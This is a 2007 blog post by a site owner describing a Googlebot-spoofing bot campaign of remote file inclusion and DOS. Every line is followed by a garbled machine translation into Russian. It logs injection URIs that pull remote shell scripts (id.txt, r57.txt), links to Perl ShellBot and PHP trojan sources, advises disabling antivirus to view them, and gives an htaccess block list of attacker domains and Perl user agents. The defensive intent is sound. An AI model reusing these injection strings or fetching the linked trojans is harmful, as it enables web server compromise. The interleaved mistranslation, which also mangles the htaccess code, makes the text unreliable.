Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan Масса дистанционного кодекса Injection, как робот Google - Пакетные Spoofing Perl бот и Trojan

For this past three days this blog is suffering DOS attack . Для этого последние три дня данного блога, страдающих DOS атаки. The attack is still alive now I don’t think they will leave yet. Нападение до сих пор живы в настоящее время я не думаю, что они оставят еще.

I cant banned this bot directly as they were sending forge packet (packet spoofing) as googlebot http://www.whois-search.com/whois/64.233.166.136. Я могу запретил это бот прямо как они были направления формирования пакета (пакетов спуфинг), как google-бот http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP. Им все еще ищем право ISP.

 OrgName: Google Inc. OrgID: GOGL Address: 1600 Amphitheatre Parkway City: Mountain View StateProv: CA PostalCode: 94043 Country: US OrgName: Google Inc OrgID: GOGL Адрес: 1600 Amphitheatre Parkway Город: Mountain View StateProv: CA индекс: 94043 Страна: США 

At the time being I blocked all remote streams from their random host *.com and “perl bot signature” but blocking will not stop them from hammering this site. На данный момент я блокировали все удаленных потоков от их случайного пребывания *. ком и "perl бот подписи", но блокировка не остановит их от hammering этом сайте. I’ll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later. Я буду отправлять 503 (Служба недоступна) по просьбе некоторых поэтому, если у вас возникли проблемы с доступом этом сайте, пожалуйста, проверьте позже.

Type of injections Вид инъекции

There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. Существует много uri параметр в моем журналов (я-инвалидов сервера - лимит средств), они, вероятно, имеет большой инвентаризации-проверить списки известных уязвимостей CMS. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page. Я могу лишь подтвердить, что его blackhat seo спам бот, как они запроса включают типичные order.php странице.

 /es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja  gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt? / эс / wordpress / хау для удален-wordpress-нетто-на спам-раствор для инъекций-инфицированных-по-mike-я gger-goro-class-mailphp/order.php /? wp = http://hom3.t35 .com / xpl / взломать / id.txt? /es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt? / эс / wordpress / order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? /order.php?wp=http://hom3.t35.com/xpl/hack/id.txt? / order.php? wp = http://hom3.t35.com/xpl/hack/id.txt? 

To view the following source you need to exclude the website host from your anti-virus program. Для просмотра следующих источников нужно исключить пребывания на сайте с вашей антивирусной программы.

• Perl/ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt Perl / ShellBot.B троянских - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
• PHP/Rst.S Trojan - http://hom3.t35.com/xpl/fidz PHP / Rst.S Trojan - http://hom3.t35.com/xpl/fidz

htaccess blocked bad Code Injector and Perl Bot (Botnet) htaccess заблокирован плохой кодекс Форсунка и Perl Бот (Botnet)

If you has similar problems. Если вы имеет аналогичные проблемы. you should block the following domain in your htaccess. Вы должны блокировать следующие домена в вашей htaccess.
mod_setenvif

 SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1 SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1 SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1 SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1 SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1 SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1 SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1  <FilesMatch "(.*)"> Order Allow,Deny Allow from all Deny from env=codeinjector_ref Deny from env=shell_bots </FilesMatch> SetEnvIfNoCase ссылка "^ http:// (www.)? T35 \. Ком" codeinjector_ref = 1 SetEnvIfNoCase ссылка "^ http:// (www.)? Jorgevolio \. Ком" codeinjector_ref = 1 SetEnvIfNoCase ссылка "^ http:// (www.)? emabe \. ком "codeinjector_ref = 1 SetEnvIfNoCase ссылка" ^ http:// (www.)? pawang \. в "codeinjector_ref = 1 SetEnvIfNoCase ссылка" ^ http:// (www.)? gw-золото \. чистых "codeinjector_ref = 1 SetEnvIfNoCase User-Agent" ^ libwww-perl * "shell_bots = 1 SetEnvIfNoCase User-Agent" ^ Amidalla * "shell_bots = 1 <FilesMatch "(.*)"> Заказ Позвольте, позвольте Отказывать от всех Отказывать с окр = codeinjector_ref Отказывать от окр = shell_bots </ FilesMatch> 

if u arent sure if you server support mod_setenvif wrap it like the below example. если у arent уверены, что если вы сервер поддержки mod_setenvif заверните ее как пример ниже.

 <IfModule mod_setenvif.c> #...replace this line with the above code... <IfModule Mod_setenvif.c> # ... заменить эту строку с кодом выше ... </IfModule> </ IfModule> 

How to trap Perl Shell Bot Как ловушку Perl Shell Bot

We need a pattern to trap this bots. Нам нужен шаблон для этой ловушки ботами. certainly we knew that these bots : конечно, мы знали, что эти роботы:

• doesn’t honor robot.txt не делает чести robot.txt
• they crawl all subdirectory они сканируют все подкаталог
• they has a pattern URI request они имеет шаблон URI запроса

For now I only create subdirectory for auto-ban (and some other stuff) based on their pattern. А сейчас я лишь создать подкаталог для автоматического запрета (и некоторые другие вещи), основанные на их характер. alexa bot will be banned too as they dont honor robot.txt. Алекса бот будет запрещена, поскольку они слишком dont честь robot.txt.

I’ll be updating this post from time to time. Я буду обновлении этой должности время от времени. Do check the related articles on how to packet spoofing and validating forge/spoof packet. Как проверить, связанных статей о том, как пакет спуфинга и проверки формирования / обман пакет.

Recent Scan & Update Последние сканирование и обновление

The below list is automatically added. Ниже список будет автоматически добавлен.

December 24, 2007 24 декабря 2007 года

ip: 64.26.63.10 param: login= , ? inject: http://pawang.in/r57.txt ip: 64.26.63.10 парам: вход =,? вдохнуть: http://pawang.in/r57.txt

December 24, 2007 24 декабря 2007 года

ip: 64.26.63.10 param: dir= , login= inject: http://pawang.in/r57.txt???? ip: 64.26.63.10 парам: реж =, логин = вдохнуть: http://pawang.in/r57.txt??

December 25, 2007 25 декабря 2007 года

ip: 59.158.128.138 param: p= , :allinurl= inject: http://gw-gold.net/jpg/pictures/test.txt ip: 59.158.128.138 парам: р =,: = вдохнуть allinurl: http://gw-gold.net/jpg/pictures/test.txt

External Resources Внешние ресурсы

• Packet spoofing - http://www.wireshark.org Пакетные спуфинг - http://www.wireshark.org
• pcapdiff validate forged packet http://www.eff.org/testyourisp/pcapdiff/ pcapdiff проверить пакет поддельных http://www.eff.org/testyourisp/pcapdiff/